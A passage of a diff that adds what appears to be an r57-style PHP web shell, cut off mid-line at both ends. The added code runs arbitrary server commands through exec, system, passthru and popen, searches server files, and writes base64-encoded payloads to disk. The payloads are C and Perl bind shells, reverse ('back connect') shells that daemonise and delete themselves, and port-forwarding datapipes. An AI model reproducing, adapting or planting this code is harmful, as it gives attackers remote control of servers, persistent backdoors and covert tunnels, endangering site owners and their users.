= "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW 